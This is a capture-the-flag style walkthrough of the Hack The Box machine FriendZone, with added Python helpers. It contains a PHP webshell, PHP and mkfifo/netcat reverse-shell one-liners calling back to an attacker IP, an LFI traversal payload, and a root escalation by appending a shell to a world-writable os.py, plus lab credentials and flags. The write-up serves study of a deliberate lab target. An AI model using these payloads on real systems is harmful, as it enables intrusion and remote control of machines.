OSCP study notes

FriendZone HTB Writeup

2023-03-13  doinb1517

Key points

1. DNS zone transfer (AXFR) allowed to anyone

2. Local file inclusion

3. Writing a webshell to an SMB share

4. Privilege escalation through a root cron job (writable Python module)

Writeup

Web access (www-data)

The usual nmap scan:

┌──(kali㉿192)-[~]
└─$ nmap -sC -sV 10.10.10.123
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-13 13:55 CST
Nmap scan report for 10.10.10.123
Host is up (0.25s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m50s, deviation: 1h09m15s, median: 8s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2023-03-13T07:58:29+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-13T05:58:30
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.90 seconds

The certificate gives us the domain friendzone.red, and the page on port 80 mentions a second one, friendzoneportal.red. Port 80 itself offers nothing useful.

Add both names to /etc/hosts (as root):

echo 10.10.10.123 friendzone.red >> /etc/hosts
echo 10.10.10.123 friendzoneportal.red >> /etc/hosts

Browsing by hostname gives the page below; brute-force the HTTP (port 80) directories:

gobuster dir -u http://friendzone.red -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt

The only hit is http://friendzone.red/wordpress/. A WordPress install looked promising, but the directory is empty: nothing to exploit there.

On to HTTPS. https://friendzone.red shows nothing but an animated image. Brute-force it too; gobuster needs -k here, otherwise it aborts on the certificate (it expired in 2018, per the nmap output). This turns up https://friendzone.red/admin/, another empty page.

# -k, --no-tls-validation                 Skip TLS certificate verification
┌──(kali㉿192)-[~]
└─$ gobuster dir -k -u https://friendzone.red -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://friendzone.red
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/13 14:47:46 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 318] [--> https://friendzone.red/admin/]
/js                   (Status: 301) [Size: 315] [--> https://friendzone.red/js/]
The other hit, /js/, at least returns content: a string of characters whose meaning I couldn't work out.

Next, SMB. smbmap lists the shares and the permissions a null session gets:

┌──(kali㉿192)-[~]
└─$ smbmap -H 10.10.10.123
[+] Guest session       IP: 10.10.10.123:445    Name: friendzone.red                                    
        Disk                                                    Permissions    Comment
        ----                                                    -----------    -------
        print$                                                  NO ACCESS      Printer Drivers
        Files                                                   NO ACCESS      FriendZone Samba Server Files /etc/Files
        general                                                 READ ONLY      FriendZone Samba Server Files
        Development                                             READ, WRITE    FriendZone Samba Server Files
        IPC$                                                    NO ACCESS      IPC Service (FriendZone server (Samba, Ubuntu))

Development is readable and writable, general is read-only. Connect to general with smbclient (just press Enter at the password prompt, or pass -N):

┌──(kali㉿192)-[~]
└─$ smbclient //10.10.10.123/general
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jan 17 04:10:51 2019
  ..                                  D        0  Tue Sep 13 22:56:24 2022
  creds.txt                           N       57  Wed Oct 10 07:52:42 2018

                3545824 blocks of size 1024. 1648408 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit


creds.txt holds a username and password. Trying them over SSH fails, though:

┌──(kali㉿192)-[~]
└─$ cat creds.txt 
creds for the admin THING:
admin:WORKWORKHhallelujah@#

Back to enumeration. Port 53 is open on TCP. Normal DNS lookups go over UDP (TCP is the fallback for answers that don't fit the classic 512-byte UDP limit), but zone transfers, the mechanism secondaries use to copy a whole zone from the primary, always run over TCP. Since nmap -sC -sV only scans TCP ports, the TCP listener by itself proves nothing; it is simply the channel to test: if BIND's allow-transfer is not restricted, anyone can pull the zone.

Ask for it with dig and the AXFR query type (type 252, a request for every record in a zone). A server that permits transfers to arbitrary clients returns the complete record set, internal hostnames included (exactly the vhosts we are missing); a properly configured one answers REFUSED.

┌──(kali㉿192)-[~]
└─$ dig axfr @10.10.10.123 friendzoneportal.red

; <<>> DiG 9.18.12-1-Debian <<>> axfr @10.10.10.123 friendzoneportal.red
; (1 server found)
;; global options: +cmd
friendzoneportal.red.   604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.   604800  IN      AAAA    ::1
friendzoneportal.red.   604800  IN      NS      localhost.
friendzoneportal.red.   604800  IN      A       127.0.0.1
admin.friendzoneportal.red. 604800 IN   A       127.0.0.1
files.friendzoneportal.red. 604800 IN   A       127.0.0.1
imports.friendzoneportal.red. 604800 IN A       127.0.0.1
vpn.friendzoneportal.red. 604800 IN     A       127.0.0.1
friendzoneportal.red.   604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 251 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Mar 13 15:17:09 CST 2023
;; XFR size: 9 records (messages 1, bytes 309)

                                                                                
┌──(kali㉿192)-[~]
└─$ dig axfr @10.10.10.123 friendzone.red      

; <<>> DiG 9.18.12-1-Debian <<>> axfr @10.10.10.123 friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.         604800  IN      AAAA    ::1
friendzone.red.         604800  IN      NS      localhost.
friendzone.red.         604800  IN      A       127.0.0.1
administrator1.friendzone.red. 604800 IN A      127.0.0.1
hr.friendzone.red.      604800  IN      A       127.0.0.1
uploads.friendzone.red. 604800  IN      A       127.0.0.1
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 247 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Mar 13 15:17:15 CST 2023
;; XFR size: 8 records (messages 1, bytes 289)

Add all of these names to /etc/hosts as well (as root):

echo 10.10.10.123 admin.friendzoneportal.red >> /etc/hosts
echo 10.10.10.123 administrator1.friendzone.red >> /etc/hosts
echo 10.10.10.123 hr.friendzone.red >> /etc/hosts
echo 10.10.10.123 uploads.friendzone.red >> /etc/hosts
echo 10.10.10.123 files.friendzoneportal.red >> /etc/hosts
echo 10.10.10.123 vpn.friendzoneportal.red >> /etc/hosts
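What dig does above, as an added example in Python (not code from the writeup or the box): a stand-alone AXFR client using only the standard library, so the TCP length framing and the SOA-bracketed record stream are explicit, plus a helper that turns the returned names into /etc/hosts lines for the target. Server, zones and IP are the page's; the SAMPLE_RESPONSE wire message is constructed for offline testing.

```python
import socket
import struct

# Added example, not from the original writeup: an AXFR client on the standard
# library only, so the TCP framing that zone transfers rely on is visible.
# Server and zone names are the page's; SAMPLE_RESPONSE below is constructed.
AXFR, CLASS_IN = 252, 1
TYPE_NAMES = {1: "A", 2: "NS", 6: "SOA", 28: "AAAA"}


def encode_name(name):
    """'hr.friendzone.red' -> b'\\x02hr\\x0afriendzone\\x03red\\x00'"""
    labels = [l for l in name.rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_axfr_query(zone, txid=0x1234):
    # header: id, flags 0 (plain query), 1 question, 0 answer/authority/additional
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(zone) + struct.pack("!HH", AXFR, CLASS_IN)


def decode_name(msg, offset):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end = [], None
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                       # pointer into an earlier name
            end = end or offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode())
        offset += length
    return ".".join(labels) + ".", (offset if end is None else end)


def parse_records(msg):
    """Return (rcode, [(owner, type, value), ...]) for one DNS message."""
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    for _ in range(qd):                                 # skip the echoed question
        _, offset = decode_name(msg, offset)
        offset += 4
    records = []
    for _ in range(an):
        owner, offset = decode_name(msg, offset)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        if rtype == 1:
            value = socket.inet_ntoa(rdata)
        elif rtype == 28:
            value = socket.inet_ntop(socket.AF_INET6, rdata)
        elif rtype == 2:
            value, _ = decode_name(msg, offset)
        elif rtype == 6:                                # SOA: mname rname serial ...
            mname, o = decode_name(msg, offset)
            value = mname + " " + decode_name(msg, o)[0]
        else:
            value = rdata.hex()
        records.append((owner, TYPE_NAMES.get(rtype, str(rtype)), value))
        offset += rdlen
    return flags & 0xF, records


def axfr(server, zone, port=53, timeout=10):
    """AXFR runs over TCP: every message carries a 2-byte length prefix and the
    transfer is complete when the opening SOA record is repeated."""
    query = build_axfr_query(zone)
    records, soa_seen = [], 0
    with socket.create_connection((server, port), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(query)) + query)
        stream = s.makefile("rb")
        while soa_seen < 2:
            length = struct.unpack("!H", stream.read(2))[0]
            rcode, recs = parse_records(stream.read(length))
            if rcode != 0 or not recs:                  # rcode 5 = REFUSED: transfers restricted
                raise RuntimeError("AXFR failed, rcode=%d" % rcode)
            records += recs
            soa_seen += sum(1 for r in recs if r[1] == "SOA")
    return records


def hosts_lines(records, target_ip):
    """Every record resolves to 127.0.0.1; the value is the vhost names, which
    we rewrite to the target for /etc/hosts."""
    names = sorted({o.rstrip(".") for o, t, _ in records if t in ("A", "AAAA")})
    return ["%s %s" % (target_ip, n) for n in names]


# Constructed response (not a capture): flags 0x8400 = authoritative answer,
# 1 question, 2 answers; the A records point at the question name via 0xC00C.
SAMPLE_RESPONSE = (
    b"\x12\x34\x84\x00\x00\x01\x00\x02\x00\x00\x00\x00"
    + encode_name("friendzone.red") + b"\x00\xfc\x00\x01"
    + b"\xc0\x0c\x00\x01\x00\x01\x00\x09\x3a\x80\x00\x04\x7f\x00\x00\x01"
    + b"\x02hr\xc0\x0c\x00\x01\x00\x01\x00\x09\x3a\x80\x00\x04\x7f\x00\x00\x01"
)

if __name__ == "__main__":
    for zone in ("friendzone.red", "friendzoneportal.red"):
        print("\n".join(hosts_lines(axfr("10.10.10.123", zone), "10.10.10.123")))
```

Run it with network access to the box to reproduce both transfers; against a server that restricts transfers the first message comes back with rcode 5 and axfr raises instead of returning records.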

https://administrator1.friendzone.red presents a login form, and admin:WORKWORKHhallelujah@# from creds.txt gets us in.

As the page hints, go on to dashboard.php.

Supplying the parameters it asks for shows a timestamp in the bottom-left corner that changes on every refresh, and the message "the script include wrong param !" all but says that pagename ends up in an include().

Requesting timestamp.php directly gives exactly the output seen through pagename=timestamp, so the script includes the parameter value with .php appended.

Use the php://filter wrapper to read the source instead of executing it:

https://administrator1.friendzone.red/dashboard.php?image_id=aa.jpg&pagename=php://filter/read=convert.base64-encode/resource=timestamp

# return data
PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo=

┌──(root192)-[/home/kali]
└─# echo PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo= |base64 -d
<?php


$time_final = time() + 3600;

echo "Final Access timestamp is $time_final";


?>

This is where the SMB share pays off: drop a webshell on the writable Development share, then include it through the LFI so Apache parses it as PHP. The missing piece is the share's path on disk. The Files share's comment names /etc/Files, so the guess is that Development is /etc/Development too (the include working confirms it).

Save the webshell locally as cmd.php:

<?php system($_REQUEST['cmd']); ?>

Upload it with an anonymous session and include it. The traversal climbs from /var/www/admin to /, and the file is named without its extension because the script appends .php itself (an absolute path, /etc/Development/cmd, is accepted as well):

smbclient -N //10.10.10.123/Development -c 'put cmd.php'
https://administrator1.friendzone.red/dashboard.php?image_id=aa.jpg&pagename=../../../etc/Development/cmd&cmd=id

Reverse shell: start a listener on the attacker box (nc -lvvp 1234 on 10.10.14.4 here), then pass this PHP one-liner as cmd, URL-encoded:

php -r '$sock=fsockopen("10.10.14.4",1234);exec("sh <&3 >&3 2>&3");'

https://administrator1.friendzone.red/dashboard.php?image_id=aa.jpg&pagename=../../../etc/Development/cmd&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.4%22%2C1234%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
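The two uses of pagename above, as a small Python helper (an added example, not the author's or the box's code): it builds the php://filter URL for dumping a page's source, decodes the base64 out of the response, and builds the traversal URL that reaches the webshell on the share. Hostname, parameter names, the /var/www/admin depth and the /etc/Development path come from the writeup; the PHPSESSID cookie name is an assumption (PHP's default), and SAMPLE_BODY is a constructed response wrapped around the base64 the page shows.

```python
import base64
import re
import ssl
import urllib.parse
import urllib.request

# Added example, not code from the writeup or the box: helpers for the two uses
# of pagename above.  Host, parameter names, /var/www/admin depth and the share
# path come from the page; the PHPSESSID cookie name is assumed (PHP default).
BASE = "https://administrator1.friendzone.red/dashboard.php"
SHARE_DIR = "/etc/Development"            # guessed from the 'Files ... /etc/Files' comment
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{20,}={0,2}")


def filter_payload(page):
    """The script does include($pagename . '.php'): name the page without its
    extension, and base64-encode so the source reaches the response unexecuted."""
    return "php://filter/convert.base64-encode/resource=" + page


def traversal_payload(share_file, depth=3):
    """dashboard.php lives in /var/www/admin, three directories below /, so
    three '../' reach the root (an absolute path would also be accepted)."""
    return "../" * depth + (SHARE_DIR + "/" + share_file).lstrip("/")


def build_url(pagename, extra=None):
    params = {"image_id": "a.jpg", "pagename": pagename}
    params.update(extra or {})                # e.g. {"cmd": "id"} for the webshell
    return BASE + "?" + urllib.parse.urlencode(params)


def decode_filter_output(body):
    """The base64 blob sits inside the dashboard HTML; the dumped file is the
    longest base64 run on the page, so take that and decode it."""
    runs = B64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 payload in response")
    return base64.b64decode(max(runs, key=len)).decode(errors="replace")


def fetch(url, session_id):
    ctx = ssl._create_unverified_context()    # the box's certificate expired in 2018
    req = urllib.request.Request(url, headers={"Cookie": "PHPSESSID=" + session_id})
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return resp.read()


# Constructed response body wrapping the base64 the page shows for timestamp.php
SAMPLE_BODY = (
    b"<html><body>admin dashboard<br>"
    b"PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3Mg"
    b"dGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo="
    b"</body></html>"
)

if __name__ == "__main__":
    import sys
    sid = sys.argv[1]                         # PHPSESSID value of the logged-in session
    for page in ("dashboard", "timestamp"):   # pages seen in /var/www/admin
        print("=== %s.php ===" % page)
        print(decode_filter_output(fetch(build_url(filter_payload(page)), sid)))
    print(fetch(build_url(traversal_payload("cmd"), {"cmd": "id"}), sid).decode())
```

Dumping dashboard.php itself through the filter is the quickest way to confirm the include and the appended extension before touching the share.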

The callback arrives as www-data. Upgrade to a pty with python3 and read user.txt from /home/friend, which is readable by www-data:

┌──(root192)-[~/.ssh]
└─# nc -lvvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from friendzone.red [10.10.10.123] 58070
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@FriendZone:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@FriendZone:/var/www/admin$ cd /home
cd /home
www-data@FriendZone:/home$ ls
ls
friend
www-data@FriendZone:/home$ cd friend
cd friend
www-data@FriendZone:/home/friend$ cat user.txt
cat user.txt
721f9eafe6a1e5b750b4e3c404072d52
www-data@FriendZone:/home/friend$

friend access

/var/www holds mysql_data.conf with the database credentials friend:Agpyu12!0.213$. The password is reused for the local friend account, so su friend works:

www-data@FriendZone:/var/www$ ls -al
ls -al
total 36
drwxr-xr-x  8 root root 4096 Sep 13 17:53 .
drwxr-xr-x 12 root root 4096 Sep 13 17:53 ..
drwxr-xr-x  3 root root 4096 Sep 13 17:53 admin
drwxr-xr-x  4 root root 4096 Sep 13 17:53 friendzone
drwxr-xr-x  2 root root 4096 Sep 13 17:53 friendzoneportal
drwxr-xr-x  2 root root 4096 Sep 13 17:53 friendzoneportaladmin
drwxr-xr-x  3 root root 4096 Sep 13 17:53 html
-rw-r--r--  1 root root  116 Oct  6  2018 mysql_data.conf
drwxr-xr-x  3 root root 4096 Sep 13 17:53 uploads
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
www-data@FriendZone:/var/www$ su friend
su friend
Password: Agpyu12!0.213$

friend@FriendZone:/var/www$ crontab -l

root access

To see what root runs, use pspy. First confirm the architecture so we fetch the right binary (pspy64):

friend@FriendZone:/var/www$ file /bin/ls
file /bin/ls
/bin/ls: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9567f9a28e66f4d7ec4baf31cfbf68d0410f0ae6, stripped

Fetch pspy64 into /tmp on the target (served from the attacker box over HTTP, e.g. with python3 -m http.server 80 in the directory that holds it):

friend@FriendZone:/tmp$ wget http://10.10.14.4/pspy64
wget http://10.10.14.4/pspy64
--2023-03-13 10:52:55--  http://10.10.14.4/pspy64
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.96M   644KB/s    in 4.7s    

2023-03-13 10:53:00 (644 KB/s) - ‘pspy64’ saved [3104768/3104768]

friend@FriendZone:/tmp$ ls
ls
pspy64
friend@FriendZone:/tmp$ chmod +x pspy64
chmod +x pspy64
friend@FriendZone:/tmp$ ./pspy64

2023/03/13 10:54:01 CMD: UID=0     PID=1890   | /usr/bin/python /opt/server_admin/reporter.py 
2023/03/13 10:54:01 CMD: UID=0     PID=1889   | /bin/sh -c /opt/server_admin/reporter.py 
2023/03/13 10:54:01 CMD: UID=0     PID=1888   | /usr/sbin/CRON -f

So root runs /opt/server_admin/reporter.py from cron, and the script does import os. Both the file (-rwxr--r--, root-owned) and its directory (755, root-owned) are unwritable for us, so neither editing the script nor dropping an os.py next to it (a script's own directory is sys.path[0]) is an option. The latter would not have worked for os anyway: the interpreter imports os while starting up (site.py needs it), so by the time the script runs, os is already in sys.modules and the script directory is never consulted for it.

www-data@FriendZone:/var/www/admin$ ls -al /opt/server_admin/reporter.py
ls -al /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16  2019 /opt/server_admin/reporter.py
www-data@FriendZone:/var/www/admin$ cat /opt/server_admin/reporter.py
cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
www-data@FriendZone:/var/www/admin$ ls -al /opt/server_admin
ls -al /opt/server_admin
total 12
drwxr-xr-x 2 root root 4096 Sep 13 17:53 .
drwxr-xr-x 3 root root 4096 Sep 13 17:53 ..
-rwxr--r-- 1 root root  424 Jan 16  2019 reporter.py
www-data@FriendZone:/var/www/admin$

Print the module search path of the interpreter the cron job uses. The shebang is /usr/bin/python and the script uses print statements, so this is Python 2.7. The blank first line is the '' entry (the current directory when using -c; for a script it is the script's own directory):

www-data@FriendZone:/var/www/admin$ python -c 'import sys; print "\n".join(sys.path)'
<$ python -c 'import sys; print "\n".join(sys.path)'

/usr/lib/python2.7
/usr/lib/python2.7/plat-x86_64-linux-gnu
/usr/lib/python2.7/lib-tk
/usr/lib/python2.7/lib-old
/usr/lib/python2.7/lib-dynload
/usr/local/lib/python2.7/dist-packages
/usr/lib/python2.7/dist-packages

Checking the directories on that path: /usr/lib/python2.7/os.py is world-writable (-rwxrwxrwx, root-owned, and dated Jan 2019 unlike the Apr 2018 files around it, so this was loosened on purpose). Any local user can append to it, not just friend, and root will execute the addition the next time cron runs reporter.py:

www-data@FriendZone:/usr/lib/python2.7$ ls -al|grep os
ls -al|grep os
-rwxr-xr-x  1 root   root    19100 Apr 16  2018 _osx_support.py
-rwxr-xr-x  1 root   root    11720 Oct  6  2018 _osx_support.pyc
-rwxrwxrwx  1 root   root    25910 Jan 15  2019 os.py
-rw-rw-r--  1 friend friend  25583 Jan 15  2019 os.pyc
-rwxr-xr-x  1 root   root     4635 Apr 16  2018 os2emxpath.py
-rwxr-xr-x  1 root   root     4507 Oct  6  2018 os2emxpath.pyc
-rwxr-xr-x  1 root   root     8003 Apr 16  2018 posixfile.py
-rwxr-xr-x  1 root   root     7628 Oct  6  2018 posixfile.pyc
-rwxr-xr-x  1 root   root    13935 Apr 16  2018 posixpath.py
-rwxr-xr-x  1 root   root    11385 Oct  6  2018 posixpath.pyc
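The same check done programmatically, as an added example that is not the author's code: it asks the interpreter the cron job actually uses (python2 here, not whatever python is on the attacker box) for its search path and its startup modules, then walks that path the way the import system does, reporting writable directories that would let a dropped module shadow the real one and module files that are themselves writable. Interpreter and script paths default to the ones pspy showed; make_demo_tree builds a constructed directory layout so the checks can run offline.

```python
import json
import os
import subprocess
import tempfile

# Added example, not the author's code: find where a module imported by a
# root-run script can be hijacked, from the low-privilege shell.  Interpreter
# and script directory default to what pspy showed; make_demo_tree is a
# constructed layout for running the checks offline.  (.pyc-only and zipped
# modules are ignored for brevity.)


def interpreter_sys_path(interpreter):
    """Ask the target interpreter (python2 for this cron job) for its own path;
    the attacker's python may have a completely different one."""
    out = subprocess.check_output(
        [interpreter, "-c", "import sys, json; print(json.dumps(sys.path))"])
    return json.loads(out.decode())


def preloaded_modules(interpreter):
    """Modules already imported when user code starts (site.py pulls in os).
    They sit in sys.modules before the script runs, so they can only be
    hijacked by editing their file, never by shadowing with an earlier copy."""
    out = subprocess.check_output(
        [interpreter, "-c", "import sys, json; print(json.dumps(sorted(sys.modules)))"])
    return set(json.loads(out.decode()))


def script_sys_path(sys_path, script_dir):
    """'python script.py' puts the script's directory at sys.path[0]; the '-c'
    probe above reports '' (the cwd) in that slot, so substitute it."""
    return [script_dir if entry == "" else entry for entry in sys_path]


def find_weak_points(sys_path, module, preloaded=frozenset()):
    """Walk the path in import order and report
    ('shadow', dir)  a writable directory searched before the real module
    ('edit', file)   the module file itself is writable"""
    findings = []
    for entry in sys_path:
        candidate = os.path.join(entry, module + ".py")
        if os.path.isfile(candidate):
            if os.access(candidate, os.W_OK):
                findings.append(("edit", candidate))
            break                                     # first hit ends the search
        if module not in preloaded and os.path.isdir(entry) and os.access(entry, os.W_OK):
            findings.append(("shadow", entry))
    return findings


def make_demo_tree():
    """Constructed layout mirroring the box: a script directory we cannot write,
    a stdlib directory whose os.py is writable, and a later dist-packages."""
    root = tempfile.mkdtemp()
    script_dir, lib_dir, dist_dir = (os.path.join(root, d)
                                     for d in ("server_admin", "python2.7", "dist-packages"))
    for d in (script_dir, lib_dir, dist_dir):
        os.mkdir(d)
    os_py = os.path.join(lib_dir, "os.py")
    with open(os_py, "w") as f:
        f.write("def system(cmd):\n    pass\n")
    os.chmod(script_dir, 0o555)                       # like root's 755 /opt/server_admin
    return {"path": [script_dir, lib_dir, dist_dir], "os_py": os_py,
            "script_dir": script_dir, "lib_dir": lib_dir}


if __name__ == "__main__":
    interp, script_dir = "/usr/bin/python", "/opt/server_admin"
    path = script_sys_path(interpreter_sys_path(interp), script_dir)
    for kind, where in find_weak_points(path, "os", preloaded_modules(interp)):
        print(kind, where)
```

Run it on the target as friend (or www-data) with python3. For os it can only ever report 'edit', because os is already imported when the script starts; that is why the writable os.py is the lever here, and why a writable /opt/server_admin would not have helped for this particular module, although it would for any module the script is the first to import.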

Append a reverse shell to the end of os.py. Inside os.py, system is the module's own function, so the unqualified call runs at import time. Start the listener first, and mind the side effect: every Python 2 process on the box (the interpreter imports os at startup) will now block on that system() call until the shell exits, so remove the line once you have root.

echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f')" >> /usr/lib/python2.7/os.py

When cron next runs reporter.py, the listener receives a root shell and the root flag:

┌──(root192)-[/home/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from friendzone.red [10.10.10.123] 36654
/bin/sh: 0: can't access tty; job control turned off
# cat /root/root.txt
b0e6c60b82cf96e9855ac1656a9e90c7
# 